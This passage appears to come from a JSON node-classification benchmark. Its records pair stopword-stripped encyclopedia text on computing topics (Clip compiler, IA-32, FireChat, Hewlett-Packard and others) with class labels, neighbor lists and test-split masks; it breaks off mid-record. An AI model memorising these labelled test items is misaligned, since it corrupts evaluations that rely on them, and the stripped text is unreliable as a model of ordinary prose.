      8462,
      8975,
      9488,
      11021,
      8978,
      11022,
      8471,
      7449,
      4892,
      5404,
      1314,
      3366,
      8998,
      3880,
      8488,
      7979,
      3887,
      7983,
      11567,
      4914,
      5427,
      10034,
      11576,
      5433,
      3392,
      10048,
      7491,
      10058,
      11594,
      9548,
      8526,
      4945,
      1875,
      2900,
      2901,
      1368,
      1369,
      3417,
      3930,
      4956,
      7515,
      1886,
      11609,
      1890,
      2403,
      3941,
      7528,
      2409,
      8554,
      10600,
      11112,
      2926,
      8050,
      2932,
      8564,
      10102,
      3447,
      4471,
      7545,
      9082,
      10615,
      1918,
      383,
      899,
      3972,
      1413,
      6019,
      9607,
      4489,
      11660,
      399,
      2959,
      3473,
      4496,
      1941,
      9112,
      7066,
      4507,
      8094,
      2975,
      5536,
      6560,
      9630,
      7075,
      10658,
      4008,
      1961,
      7080,
      939,
      9646,
      943,
      10671,
      433,
      1970,
      11185,
      8122,
      3516,
      8637,
      11198,
      3521,
      1474,
      11202,
      3525,
      1479,
      1480,
      3528,
      3529,
      4554,
      9160,
      10190,
      5585,
      6098,
      9688,
      8666,
      10717,
      10207,
      3552,
      9184,
      1509,
      8165,
      8170,
      2539,
      11244,
      9710,
      9714,
      7156,
      7668,
      10742,
      10232,
      2041,
      2558
    ],
    "mask": "None"
  },
  {
    "node_id": 5374,
    "label": 9,
    "text": "Clip_(compiler):clip compiler clip compiler compiler clipper programming language additional features libraries gtk fivewin netto mysql odbc cti tcp gzip interbase oracle postgres quite fast support hyper-six foxpro rdd compile existing clipper source code minor changes support features original compiler access multiple types databases oracle informix interbase mysql postgres xbase dialects tables foxpro visual foxpro comix indexes ndx ntx cdx supports object-oriented programming preprocessor dynamic static libraries several functions math string management arrays vectors clip licensed gpl type license uses gnu cc compiler",
    "neighbors": [
      1952,
      6112,
      6850,
      4614,
      6631,
      8262,
      3435,
      7022,
      7983,
      2929,
      5397,
      2903
    ],
    "mask": "Test"
  },
  {
    "node_id": 5375,
    "label": 3,
    "text": "Network_Computer:network computer network computer nc diskless desktop computer device made oracle corporation 1996 2000 devices designed manufactured alliance included sun microsystems ibm others devices designed minimum specifications based network computer reference profile brand also employed marketing term try popularize design computer within enterprise among consumers nc brand mainly intended inspire range desktop computers various suppliers virtue diskless design use inexpensive components software cheaper easier manage standard fat client desktops however due commoditization standard desktop components due increasing availability popularity various software options using full desktops diskless nodes thin clients hybrid clients network computer brand never achieved popularity hoped oracle eventually mothballed term network computer used diskless desktop computer thin client failure nc impact scale predicted larry ellison may caused number factors firstly prices pcs quickly fell 1000 making competition hard secondly software available ncs neither mature open thirdly idea could simply ahead time nc launch 1996 typical home internet connection 28.8 kbit/s modem dialup simply insufficient delivery executable content world wide web considered mainstream breakout year 1998 prior internet service providers advertised mainstream press least outside us knowledge internet limited could held back uptake would seen niche device obvious appeal ncs ended used 'dumb terminals intended replace proprietary backend infrastructure readily available 1990s era ncs often network-booted minimal unix x serve x terminals nc purists may consider suboptimal use nc hardware ncs work well terminals considerably cheaper purpose-built terminal hardware initial network computing standard network computer reference profile ncref required 'nc appliances supported html java http jpeg key standards many ncs use intel cpus microsoft software microsoft intel developed competing standard called netpc alternatives ncref webref motorola hds network systems odin national semiconductor hds workstation stated ship end june 1996 acorn network computer oracle initial reference implementation nc development subcontracted british company acorn computers adapted create ncos acorn made use local partner companies ant icon technology design edge fulfil contract 1997 apple announced mac nc attempt develop pippin network computer platform end 1997 steve jobs discontinued macintosh clone efforts effectively killing pippin although key components mac nc technology inherited original imac first generation netstation design netstation trademark licensed nchannel provided consumer equipment internet service associated infrastructure uk market months nchannel split two entities netchannel provided internet service netproducts provided consumer hardware netproducts started working acorn develop next-generation product netstation ii started developing email-only set-top-box tvemail netproducts went voluntary liquidation 1998 either project completed sun microsystems developed javastation javaos-based nc based sparc hardware initially similar sun range unix workstations ibm launched network station september 1996 later reference design network station used netbsd-based ncos booted lan as/400 ibm pc server network station supported local execution basic applications web browser console addition x capability also implemented allow locally remotely run applications used machine practice lack real applications meant little hardware x terminal ibm network station originally based powerpc architecture final models used intel pentium processors see idea behind nc existing contemporary times system cloud computing particular google chrome os wired magazine daniel roth claims failure network computer eventually led development cloud computing large contribution transition attributed eric schmidt cto sun microsystems proponent network computer eventually became ceo google google large purveyor cloud technology notably google docs spreadsheets",
    "neighbors": [
      9665,
      4194,
      4679,
      4235,
      7822,
      10926,
      1776,
      5872,
      6322,
      10481,
      5492,
      8700,
      10325,
      1399,
      3323,
      1788,
      3166
    ],
    "mask": "Test"
  },
  {
    "node_id": 5376,
    "label": 4,
    "text": "PrivacyStar:privacystar privacystar service identifies calling provides call complaint filing reports federal trade commission privacystar service available web mobile applications android ios several applications powered privacystar call text blocking available applications along privacystar ’ iphone lookup+ application enable users file potential debt collector telemarketer violations directly ftc application captures detailed information possible fair debt collection practices act violations including date time number identity allows users easily provide information regulatory agencies may take action privacystar 1.2 million users blocked 120 million calls filed 300,000 complaints directly federal trade commission september 2012 fact privacystar leading source call complaint data reported ftc 2015 users filed 31 call complaints february 13 2013 privacystar launched free sms spam complaint filing feature android smartphones application allows users file text message spam complaints addition existing ability file call complaints directly federal trade commission android phones founded 2008 jeff stalnaker josh smith privacystar based little rock arkansas jeff stalnaker president ceo company prior privacystar stalnaker held position division president financial services division acxiom marketing company josh smith coo privacystar charles morgan executive chairman board first orion corp. private company developed markets privacystar",
    "neighbors": [
      9732,
      1949
    ],
    "mask": "Test"
  },
  {
    "node_id": 5377,
    "label": 3,
    "text": "Multimedia_PC:multimedia pc multimedia pc mpc recommended configuration personal computer pc cd-rom drive standard set named multimedia pc marketing council working group software publishers association spa software information industry association mpmc comprised companies including microsoft creative labs dell gateway fujitsu pc required standards could called mpc licensing use logo spa cd-rom drives coming market 1990 difficult concisely communicate consumer hardware requirements using multimedia software mostly meant displaying video synced audio pc via cd-rom drive mpc standard supposed communicate concisely consumer buying hardware software could simply look mpc logo assured compatibility mpc program mixed results primarily vast number pcs sold different brands windows became ubiquitous pcs specifying minimum recommended windows versions features often clearer consumers mpc nomenclature standardized term failed catch software publishers association turned away consumer software late 1990s interest mpc standard vanished problem software labeling continues especially field computer games multitude 3d video cards manufactured extremely wide range capabilities common industry labeling standard let consumers know whether card powerful enough let play particular game first mpc minimum standard set 1991 1993 mpc level 2 minimum standard announced 1996 mpc level 3 announced",
    "neighbors": [
      6797,
      8301,
      6129,
      8561,
      9137,
      9363,
      533,
      1400,
      4699
    ],
    "mask": "Test"
  },
  {
    "node_id": 5378,
    "label": 2,
    "text": "System_virtual_machine:system virtual machine computing system virtual machine virtual machine provides complete system platform supports execution complete operating system os usually emulate existing architecture built purpose either providing platform run programs real hardware available use example executing otherwise obsolete platforms multiple instances virtual machines leading efficient use computing resources terms energy consumption cost effectiveness known hardware virtualization key cloud computing environment vm originally defined popek goldberg efficient isolated duplicate real machine system virtual machine advantages main disadvantages vms multiple vms running guest operating system frequently engaged server consolidation order avoid interference separate vms actual machine platform desire run multiple operating systems initial motivation virtual machines allow time-sharing among several single-tasking operating systems respects system virtual machine considered generalization concept virtual memory historically preceded ibm cp/cms first systems allow full virtualization implemented time sharing providing user single-user operating system cms unlike virtual memory system virtual machine entitled user write privileged instructions code approach certain advantages adding input/output devices allowed standard system technology evolves virtual memory purposes virtualization new systems memory overcommitment may applied manage memory sharing among multiple virtual machines one actual computer operating system may possible share memory pages identical contents among multiple virtual machines run physical machine may result mapping physical page technique known kernel samepage merging particularly useful read-only pages contain code segments particular would case multiple virtual machines running similar software software libraries web servers middleware components etc guest operating systems need compliant host hardware thereby making possible run different operating systems computer e.g. microsoft windows linux previous versions operating system support future software use virtual machines support separate guest operating systems popular regard embedded systems typical use would run real-time operating system simultaneously preferred complex operating system linux windows another use would novel unproven software still developmental stage runs inside sandbox virtual machines advantages operating system development may include improved debugging access faster reboots different virtualization techniques used based desired usage native execution based direct virtualization underlying raw hardware thus provides multiple instances architecture real machine based capable running complete operating systems virtual machines also emulate different architectures allow execution software applications operating systems written another cpu architecture operating-system-level virtualization allows resources computer partitioned via kernel support multiple isolated user space instances usually called containers may look feel like real machines end users computer architectures capable hardware-assisted virtualization enables efficient full virtualization using virtualization-specific hardware capabilities primarily host cpus approach described full virtualization hardware implemented using type 1 type 2 hypervisor type 1 hypervisor runs directly hardware type 2 hypervisor runs another operating system linux windows virtual machine run operating system supported underlying hardware users thus run two different guest operating systems simultaneously separate private virtual computers pioneer system using concept ibm cp-40 first 1967 version ibm cp/cms 1967–1972 precursor ibm vm family 1972–present vm architecture users run relatively simple interactive computing single-user operating system cms guest top vm control program vm-cp approach kept cms design simple running alone control program quietly provides multitasking resource management services behind scenes addition cms communication system tasks performed multitasking vms rscs gcs tcp/ip unix users run ibm operating systems mvs even new cp z/os even simple cms could run threaded environment listserv trickle z/vm current version vm used support hundreds thousands virtual machines given mainframe installations use linux z systems run web servers linux runs operating system within many virtual machines full virtualization particularly helpful operating system development experimental new code run time older stable versions separate virtual machine process even recursive ibm debugged new versions virtual machine operating system vm virtual machine running older version vm even used technique simulate new hardware standard x86 instruction set architecture used modern pcs actually meet popek goldberg virtualization requirements notably execution mode sensitive machine instructions always trap would allow per-instruction virtualization despite limitations several software packages managed provide virtualization x86 architecture even though dynamic recompilation privileged code first implemented vmware incurs performance overhead compared vm running natively virtualizable architecture ibm system/370 motorola mc68020 several software packages virtual pc virtualbox parallels workstation virtual iron manage implement virtualization x86 hardware intel amd introduced features x86 processors enable virtualization hardware well virtualization resources single machine multiple independent nodes cluster combined accessed single virtual numa machine virtual machines also perform role emulator allowing software applications operating systems written another computer processor architecture run operating-system-level virtualization server virtualization technology virtualizes servers operating system kernel layer thought partitioning single physical server sliced multiple small partitions otherwise called virtual environments virtual private servers vps guests zones etc partition looks feels like real server point view users example solaris zones supports multiple guest operating systems running operating system solaris 10 guest operating systems use kernel level operating system version separate copy operating system different kernel version using solaris kernel zones solaris native zones also requires host operating system version solaris operating systems manufacturers supported however solaris branded zones would need used operating systems zones another example system workload partitions wpars introduced version 6.1 ibm aix operating system system wpars software partitions running one instance global aix os environment operating system level architecture low overhead helps maximize efficient use server resources virtualization introduces negligible overhead allows running hundreds virtual private servers single physical server contrast approaches full virtualization like vmware paravirtualization like xen uml achieve level density due overhead running multiple kernels side operating system-level virtualization allow running different operating systems i.e. different kernels although different libraries distributions etc possible.different virtualization techniques used based desired usage native execution based direct virtualization underlying raw hardware thus provides multiple instances architecture real machine based capable running complete operating systems virtual machines also emulate different architectures allow execution software applications operating systems written another cpu architecture operating-system-level virtualization allows resources computer partitioned via kernel support multiple isolated user space instances usually called containers may look feel like real machines end users computer architectures capable hardware-assisted virtualization enables efficient full virtualization using virtualization-specific hardware capabilities primarily host cpus examples virtualization-enabled hardware include following",
    "neighbors": [
      9090,
      6150,
      5384,
      6153,
      2058,
      6797,
      4238,
      7053,
      4112,
      8466,
      11539,
      789,
      9366,
      9371,
      6557,
      2334,
      8863,
      10016,
      8609,
      2212,
      6438,
      295,
      10537,
      2731,
      7983,
      7217,
      7349,
      5174,
      823,
      4664,
      5049,
      7733,
      9525,
      9655,
      8509,
      318,
      5697,
      9665,
      5702,
      9932,
      7248,
      1362,
      7507,
      2645,
      4695,
      11097,
      8439,
      2269,
      2910,
      863,
      225,
      4194,
      1513,
      9964,
      5358,
      499,
      7286,
      1399,
      2168,
      3323,
      8700,
      4734
    ],
    "mask": "Test"
  },
  {
    "node_id": 5379,
    "label": 1,
    "text": "Datavail:datavail datavail remote database administration provider based broomfield colorado company provides services db2 oracle sql mysql databases according inc. company largest provider remote database administration services north america mark perlstein serves company president ceo datavail founded result spin-off stratavia 2008 november datavail moved headquarters downtown denver colorado broomfield colorado company managed 7000 databases 47 corporate clients year november 2010 datavail appointed mark perlstein ceo company acquired blue gecko seattle-based managed service provider july 2012 blue gecko began operating subsidiary datavail acquisition company 283 percent three-year growth rate 900 employees 3 branches india",
    "neighbors": [
      10413,
      7022,
      4255
    ],
    "mask": "None"
  },
  {
    "node_id": 5380,
    "label": 3,
    "text": "IA-32:ia-32 ia-32 short intel architecture 32-bit sometimes also called i386 32-bit version x86 instruction set architecture designed intel first implemented 80386 microprocessor 1985 ia-32 first incarnation x86 supports 32-bit computing result ia-32 term may used metonym refer x86 versions support 32-bit computing within various programming language directives ia-32 still sometimes referred i386 architecture contexts certain iterations ia-32 isa sometimes labelled i486 i586 i686 referring instruction supersets offered 80486 p5 p6 microarchitectures respectively updates offered numerous additions alongside base ia-32 set i.e floating-point capabilities mmx extensions intel historically largest manufacturer ia-32 processors second biggest supplier amd 1990s via transmeta chip manufacturers also produced ia-32 compatible processors e.g winchip modern era intel still produces ia-32 processors intel quark microcontroller platform however since 2000s majority manufacturers intel included moved almost exclusively implementing cpus based 64-bit variant x86 x86-64 x86-64 specification offers legacy operating modes operate ia-32 isa backwards compatibility even given contemporary prevalence x86-64 2018 ia-32 protected mode versions many modern operating systems still maintained e.g microsoft windows ubuntu linux distribution spite ia-32 name causing potential confusion 64-bit evolution x86 originated amd would known ia-64 name instead belonging intel itanium architecture primary defining characteristic ia-32 availability 32-bit general-purpose processor registers example eax ebx 32-bit integer arithmetic logical operations 32-bit offsets within segment protected mode translation segmented addresses 32-bit linear addresses designers took opportunity make improvements well significant changes described",
    "neighbors": [
      10752,
      3586,
      11269,
      6151,
      4108,
      5645,
      9741,
      5649,
      19,
      8725,
      4630,
      2584,
      8728,
      6171,
      5148,
      6683,
      543,
      7713,
      8226,
      7717,
      550,
      11301,
      5673,
      3114,
      11305,
      44,
      10284,
      2094,
      7728,
      2105,
      2107,
      6717,
      6718,
      2623,
      9280,
      2625,
      8771,
      582,
      3654,
      8262,
      585,
      6730,
      9798,
      10317,
      4174,
      11351,
      602,
      5214,
      1119,
      608,
      4192,
      2658,
      6240,
      6243,
      2149,
      10851,
      6759,
      11363,
      4204,
      3182,
      2671,
      1137,
      115,
      8820,
      4217,
      3194,
      8315,
      636,
      1149,
      6270,
      639,
      1664,
      641,
      1151,
      8322,
      2180,
      2692,
      8325,
      8327,
      10375,
      5769,
      7307,
      1677,
      4237,
      6797,
      2704,
      7311,
      10896,
      8851,
      6804,
      11410,
      5272,
      6296,
      1178,
      7326,
      671,
      2719,
      3745,
      4255,
      7840,
      10910,
      9899,
      7343,
      2225,
      3250,
      7858,
      3764,
      4276,
      9908,
      9911,
      5306,
      10428,
      2237,
      5309,
      6339,
      2244,
      7363,
      6858,
      8907,
      2764,
      8908,
      3793,
      7889,
      5844,
      6868,
      9944,
      2777,
      221,
      9437,
      1247,
      3296,
      7392,
      7904,
      10463,
      7913,
      5356,
      5358,
      5871,
      1776,
      6898,
      3317,
      5883,
      8445,
      8957,
      1791,
      255,
      9983,
      2309,
      1798,
      3334,
      5386,
      5898,
      9996,
      9487,
      8976,
      3857,
      274,
      11539,
      1301,
      4374,
      4886,
      3352,
      4887,
      7963,
      1820,
      3869,
      2334,
      2335,
      6942,
      10012,
      11549,
      5411,
      5924,
      10531,
      11550,
      11047,
      11559,
      3883,
      6445,
      7983,
      7473,
      9009,
      10033,
      10548,
      9525,
      3894,
      2872,
      5432,
      1339,
      6462,
      6978,
      6979,
      5444,
      10051,
      3911,
      11080,
      11595,
      7001,
      862,
      4961,
      2406,
      363,
      6508,
      9579,
      7027,
      1397,
      2424,
      7546,
      10620,
      11644,
      894,
      5503,
      2944,
      1409,
      4480,
      3459,
      3971,
      3973,
      7039,
      3463,
      8576,
      1417,
      9092,
      9095,
      6028,
      8588,
      1422,
      9611,
      7057,
      8594,
      5523,
      2452,
      9107,
      9111,
      2457,
      9342,
      9625,
      3484,
      925,
      5541,
      10149,
      6055,
      10151,
      4521,
      426,
      2987,
      1964,
      4010,
      8621,
      1455,
      11180,
      11184,
      1971,
      439,
      8119,
      8120,
      9655,
      10680,
      8125,
      8126,
      9152,
      5057,
      8644,
      4550,
      2506,
      7629,
      1998,
      2000,
      977,
      5073,
      5076,
      9173,
      5078,
      5080,
      473,
      2010,
      3034,
      477,
      7134,
      3042,
      8162,
      5093,
      1000,
      3049,
      4074,
      3051,
      5612,
      1005,
      7657,
      6639,
      8168,
      8684,
      10732,
      499,
      8180,
      2549,
      9205,
      6135,
      10739,
      8186,
      3068,
      3070
    ],
    "mask": "None"
  },
  {
    "node_id": 5381,
    "label": 3,
    "text": "ARMulator:armulator arm instruction set simulator armulator one software development tools provided development systems business unit arm limited users arm-based chips owes heritage early development instruction set sophie wilson part heritage still visible provision tube bbc micro model armulator armulator written c provides instruction set simulator provides virtual platform system emulation comes ready emulate arm processor certain arm coprocessors processor part embedded system licensees may extend armulator add implementations additional hardware armulator model armulator provides number services help time-based behaviour event scheduling ships examples memory mapped co-processor expansions way use armulator emulate entire embedded system key limitation armulator simulate single arm cpu one time although almost arm cores arm11 available performance armulator good technology employed 1000 host pc instructions per arm instruction means emulated speeds 1 mhz normal pcs mid late 90s accuracy good although classed cycle count accurate rather cycle accurate arm pipeline n't fully modeled although register interlocks resolution instruction consequence single stepping register interlocks ignored different cycle counts returned program simply run unavoidable testing armulator always time consuming challenge full arm architecture validation suites employed 1 million lines c code fairly hefty product armulator allows runtime debugging using either armsd arm symbolic debugger either graphical debuggers shipped sdt later ads products armulator suffered invisible tool text file configuration armul.conf many found complex configure armulator ii formed basis high accuracy cycle callable co-verification models arm processors covs models see cycle accurate simulator basis many coverification systems arm processors armulator available broad range platforms life including mac risc os platforms dec alpha hp-ux solaris sunos windows linux mid-90s reluctance support windows platforms pre-windows 95 relatively challenging platform late 90 early 00 support removed solaris windows linux although undoubtedly code base remains littered pragmas ifdef riscos armulator ii shipped early arm toolkits well later sdt 2.5 sdt 2.5.1 ads 1.0 ads 1.1 ads 1.2 rcvt 1.0 also separately rviss special models produced development cpus notably arm9e arm10 arm11 models helped architectural decisions thumb-2 trustzone armulator gradually phased replaced just-in-time compilation-based high performance cpu system models see fastsim link armulator made open source basis gnu version armulator key differences memory interface services also instruction decode done differently gnu armulator available part gdb debugger arm gnu tools armulator ii formed basis high accuracy cycle callable co-verification models arm processors covs models see cycle accurate simulator basis many coverification systems arm processors mentor graphic seamless market leading covs system supports many arm cores many cpus armulator ii shipped early arm toolkits well later sdt 2.5 sdt 2.5.1 ads 1.0 ads 1.1 ads 1.2 rvct 1.0 also separately rviss key contributors armulator ii mike williams louise jameson charles lavender donald sinclair chris lamb rebecca bryan worked armulator engineer later product manager significant input also made allan skillman working arm coverification models time key contributor armulator dave jaggar special models produced development cpus notably arm9e arm10 arm11 models helped architectural decisions thumb-2 trustzone",
    "neighbors": [
      8609,
      2435,
      10436,
      3142,
      9964,
      6797,
      6415,
      659,
      823,
      1304,
      2045
    ],
    "mask": "None"
  },
  {
    "node_id": 5382,
    "label": 7,
    "text": "FireChat:firechat firechat proprietary mobile app developed open garden uses wireless mesh networking enable smartphones connect via bluetooth wi-fi apple ’ multipeer connectivity framework without internet connection connecting peer-to-peer though designed purpose mind firechat used communication tool civil protests app first introduced march 2014 iphones followed april 3 version android devices july 2015 firechat introduced private messaging possible post messages public chatrooms may 2016 firechat introduced firechat alerts allow users send push alerts specific time place feature aimed aid workers disaster relief developed partnership marikina city philippines firechat first became popular 2014 iraq following government restrictions internet use thereafter hong kong protests 2015 firechat also promoted protesters 2015 ecuadorian protests september 11 2015 pro-independence demonstration called free way catalan republic firechat used 131,000 times january 2016 students protested university hyderabad india following suicide phd student named rohith vemula students reported used firechat university shut wi-fi current version oct 2018 seems fork riot.im june 2014 firechat developers told wired p eople need understand tool communicate anything would put harmful situation discovered somebody hostile ... meant secure private communications july 2015 firechat claims use end-to-end encryption protect one-to-one private messages",
    "neighbors": [
      10242,
      3460,
      11399,
      9098,
      1036,
      2829,
      11408,
      3610,
      3228,
      10271,
      3105,
      10021,
      1959,
      9511,
      9519,
      8758,
      1467,
      1083,
      8640,
      6982,
      6855,
      2760,
      1738,
      2892,
      3284,
      4952,
      4318,
      610,
      3812,
      4068,
      6628,
      9572,
      3959,
      7928,
      10748
    ],
    "mask": "Test"
  },
  {
    "node_id": 5383,
    "label": 9,
    "text": "Leaning_toothpick_syndrome:leaning toothpick syndrome computer programming leaning toothpick syndrome lts situation quoted expression becomes unreadable contains large number escape characters usually backslashes avoid delimiter collision official perl documentation introduced term wider usage phrase used describe regular expressions match unix-style paths elements separated slashes codice_1 slash also used default regular expression delimiter must escaped back slash codice_2 leading frequent escaped slashes represented codice_3 doubled urls yields codice_4 escaped codice_5 similar phenomenon occurs dos/windows paths backslash used path separator requiring doubled backslash codice_6 – -escaped regular expression inside escaped string requiring codice_7 match single backslash extreme cases regular expression escaped string matching uniform naming convention path begins codice_6 requires 8 backslashes codice_9 due 2 backslashes double-escaped lts appears many programming languages many situations including patterns match uniform resource identifiers uris programs output quoted text many quines fall latter category consider following perl regular expression intended match uris identify files codice_10 directory ftp site perl like sed solves problem allowing many characters delimiters regular expression example following three examples equivalent expression given -- use wikipedia syntax highlighter handle perl color misleadingly -- pre /pre common translation convert backslashes forward slashes pre /pre may easier understand written like pre /pre perl program print html link tag url link text stored variables codice_11 codice_12 respectively might look like notice use backslashes escape quoted double-quote characters syntaxhighlight lang= html using single quotes delimit string feasible perl expand variables inside single-quoted strings code example would work intended using codice_13 function viable solution many languages perl c php codice_14 operator perl allows delimiter documents especially well suited multi-line strings however documents n't allowed proper indentation 5.26 example shows perl syntax print « here_it_ends href= url text /a here_it_ends c programming language handles lts use codice_15 symbol start string literals initial quotation marks e.g rather otherwise requiring c++11 standard adds raw strings string contains characters codice_16 optional delimiter used codice_17 following example go indicates string raw using backtick delimiter c \\foo\\bar.txt raw strings may contain character except backticks escape code backtick raw string raw strings may also span multiple lines example strings codice_18 codice_19 equivalent string spans multiple lines. string that\\nspans multiple\\nlines python similar construct using codice_20 one also use together triple quotes ruby uses single quote indicate raw string filepath c \\foo\\bar.txt' also allows change delimiter like perl r ftp // ^/ */pub/ r ftp // ^/ */pub/ scala allows usage triple quotes order prevent escaping confusion triple quotes also allow multiline strings shown sed regular expressions particularly using operator much similar perl sed predecessor perl default delimiter delimiter used default s/regexp/replacement/ regexp replacement also valid form example match pub directory perl example replace foo default escaping slashes using exclamation point delimiter instead yields",
    "neighbors": [
      7364,
      8644,
      8582,
      9735,
      8554,
      9245,
      3571,
      5492,
      3705,
      1435,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 5384,
    "label": 7,
    "text": "Hewlett-Packard:hewlett-packard hewlett-packard company commonly referred hp stylized hp hewlett-packard american multinational information technology company headquartered palo alto california developed provided wide variety hardware components well software related services consumers small- medium-sized businesses smbs large enterprises including customers government health education sectors company founded one-car garage palo alto bill hewlett david packard initially produced line electronic test equipment hp world leading pc manufacturer 2007 q2 2013 time lenovo ranked ahead hp hp specialized developing manufacturing computing data storage networking hardware designing software delivering services major product lines included personal computing devices enterprise industry standard servers related storage devices networking products software diverse range printers imaging products hp directly marketed products households small- medium-sized businesses enterprises well via online distribution consumer-electronics office-supply retailers software partners major technology vendors hp also services consulting business around products partner products hewlett-packard company events included spin-off electronic bio-analytical measurement instruments part business agilent technologies 1999 merger compaq 2002 acquisition eds 2008 led combined revenues 118.4 billion 2008 fortune 500 ranking 9 2009 november 2009 hp announced acquisition 3com deal closing april 12 2010 april 28 2010 hp announced buyout palm inc. 1.2 billion september 2 2010 hp bidding war 3par 33 share offer 2.07 billion dell declined match hewlett-packard spun enterprise products services business hewlett packard enterprise november 1 2015 hewlett-packard held onto pc printer businesses renamed hp inc. bill hewlett david packard graduated degrees electrical engineering stanford university 1935 company originated garage nearby palo alto fellowship past professor frederick terman stanford great depression considered terman mentor forming hewlett-packard 1938 packard hewlett began part-time work rented garage initial capital investment us 538 1939 hewlett packard decided formalize partnership tossed coin decide whether company founded would called hewlett-packard hp packard-hewlett hp incorporated august 18 1947 went public november 6 1957 many projects worked first financially successful product precision audio oscillator model hp200a innovation use small incandescent light bulb known pilot light temperature dependent resistor critical portion circuit negative feedback loop stabilized amplitude output sinusoidal waveform allowed sell model 200a 89.40 competitors selling less stable oscillators 200 model 200 series generators continued production least 1972 200ab still tube-based improved design years one company earliest customers walt disney productions bought eight model 200b oscillators 71.50 use certifying fantasound surround sound systems installed theaters movie fantasia worked counter-radar technology artillery shell fuses world war ii allowed packard hewlett exempt draft hp recognized symbolic founder silicon valley although actively investigate semiconductor devices years traitorous eight abandoned william shockley create fairchild semiconductor 1957 hewlett-packard hp associates division established around 1960 developed semiconductor devices primarily internal use hp associates co-founded another former bell labs researcher mosfet mos transistor inventor mohamed atalla served director semiconductor research instruments calculators products using semiconductor devices hp associates 1960s hp partnered sony yokogawa electric companies japan develop several high-quality products products huge success high costs building hp-looking products japan hp yokogawa formed joint venture yokogawa-hewlett-packard 1963 market hp products japan hp bought yokogawa electric share hewlett-packard japan 1999 hp spun small company dynac specialize digital equipment name picked hp logo hp could turned upside reverse reflect image logo dy new company eventually dynac changed dymec folded back hp 1959 hp experimented using digital equipment corporation dec minicomputers instruments deciding would easier build another small design team deal dec hp entered computer market 1966 hp 2100 hp 1000 series minicomputers simple accumulator-based design two accumulator registers hp 1000 models two index registers series produced 20 years spite several attempts replace forerunner hp 9800 hp 250 series desktop business computers hp 3000 advanced stack-based design business computing server later redesigned risc technology hp 2640 series smart intelligent terminals introduced forms-based interfaces ascii terminals also introduced screen labeled function keys commonly used gas pumps bank atms hp 2640 series included one first bit mapped graphics displays combined hp 2100 21mx f-series microcoded scientific instruction set enabled first commercial wysiwyg presentation program bruno later became program hp-draw hp 3000 although scoffed formative days computing hp would eventually surpass even ibm world largest technology vendor terms sales although programma 101 first commercial desktop computer hp identified wired magazine producer world first device called personal computer hewlett-packard 9100a introduced 1968 programma 101 called computer personale italian fiera di milano 1966 hp called desktop calculator bill hewlett said called computer would rejected customers computer gurus n't look like ibm therefore decided call calculator nonsense disappeared engineering triumph time logic circuit produced without integrated circuits assembly cpu entirely executed discrete components crt display magnetic-card storage printer price around 5,000 machine keyboard cross scientific calculator adding machine alphabetic keyboard steve wozniak co-founder apple originally designed apple computer working hp offered right first refusal work take company wanted stay scientific business industrial markets wozniak said hp turned 5 times loyalty hp made hesitant start apple steve jobs company earned global respect variety products introduced world first handheld scientific electronic calculator 1972 hp-35 first handheld programmable 1974 hp-65 first alphanumeric programmable expandable 1979 hp-41c first symbolic graphing calculator hp-28c like scientific business calculators oscilloscopes logic analyzers measurement instruments reputation sturdiness usability latter products part spin-off agilent product line later spun agilent keysight technologies company design philosophy period summarized design guy next bench 98x5 series technical desktop computers started 1975 9815 cheaper 80 series technical computers started 1979 85 machines used version basic programming language available immediately switched used proprietary magnetic tape storage hp computers similar capabilities much later ibm personal computer although limitations available technology forced prices high 1984 hp introduced inkjet laser printers desktop along scanner product line later developed successful multifunction products significant single-unit printer/scanner/copier/fax machines print mechanisms hp tremendously popular laserjet line laser printers depend almost entirely canon inc. components print engines turn use technology developed xerox hp develops hardware firmware software convert data dots printing march 3 1986 hp registered hp.com domain name making ninth internet .com domain ever registered 1987 palo alto garage hewlett packard started business designated california state historical landmark 1990s hp expanded computer product line initially targeted university research business users reach consumers hp also grew acquisitions bought apollo computer 1989 convex computer 1995 later decade hp opened hpshopping.com independent subsidiary sell online direct consumers 2005 store renamed hp home home office store 1995 1998 hewlett-packard sponsors english football team tottenham hotspur 1999 businesses related computers storage imaging spun hp form agilent technologies agilent spin-off largest initial public offering history silicon valley spin-off created 8 billion company 30,000 employees manufacturing scientific instruments semiconductors optical networking devices electronic test equipment telecom wireless r production july 1999 hp appointed carly fiorina formerly lucent first female ceo fortune-20 company dow jones industrial average fiorina received larger signing offer predecessors fiorina served ceo technology downturn early 2000s led merger compaq disastrous according cnn led firing 30,000 u.s. employees leadership company doubled size tenure ceo beset damaging leaks hp board directors asked fiorina step 2005 following boardroom disagreement resigned february 9 2005 1997 hp sold 120 million worth printers computer products iran european subsidiary dubai-based east distributor despite u.s. export sanctions prohibiting deals imposed bill clinton executive orders issued 1995 story initially reported boston globe triggered inquiry sec hp responded products worth 120 million sold fiscal year 2008 distribution way redington gulf company based netherlands sales took place foreign subsidiary hp violated sanctions hp named redington gulf wholesaler year 2003 turn published press release stating seeds redington-hewlett-packard relationship sowed six years ago one market — iran time redington gulf three employees whose sole purpose sell hp products iran market according former officials worked sanctions hp using loophole routing sales foreign subsidiary hp ended relationship redington gulf sec inquiry september 3 2001 hp announced agreement reached compaq merge two companies may 2002 passing shareholder vote hp officially merged compaq prior plans place consolidate companies product teams product lines compaq already taken digital equipment corporation 1998 hp therefore still offers support former digital equipment products pdp-11 vax alphaserver merger occurred proxy fight bill hewlett son walter objected merger compaq bought tandem computers 1997 started ex-hp employees digital equipment corporation 1998 following strategy hp became major player desktops laptops servers many different markets merger compaq new ticker symbol became hpq combination two previous symbols hwp cpq show significance alliance also key letters two companies hewlett-packard compaq latter company famous q logo products 2004 hp released dv 1000 series including hp pavilion dv 1658 1040 two years later may 2006 hp began campaign computer personal campaign designed bring back fact pc personal product campaign utilized viral marketing sophisticated visuals website www.hp.com/personal ads featured pharrell petra nemcova mark burnett mark cuban alicia keys jay-z gwen stefani shaun white january 2005 following years performance included hp compaq merger fell short disappointing earning reports board asked fiorina resign chair chief executive officer company following news fiorina departure hp stock jumped 6.9 percent robert wayman chief financial officer hp served interim ceo board undertook formal search replacement mark hurd ncr corporation hired take ceo president effective 1 april 2005 hurd board top choice given revival ncr took place leadership 2006 hp unveiled several new products including desktops enhanced notebooks workstation software manage openview client configuration manager 2.0 year hp share price skyrocketed due consistent results last couple quarters year hurd plan cutback hp workforce lower costs july 2007 hp signed definitive agreement acquire opsware cash tender deal values company 14.25 per share combined opsware software oracle enterprise management software first years hurd new role hp stock price doubled end fiscal 2007 hp hit 100 billion mark first time company annual revenue reached 104 billion allowing hp 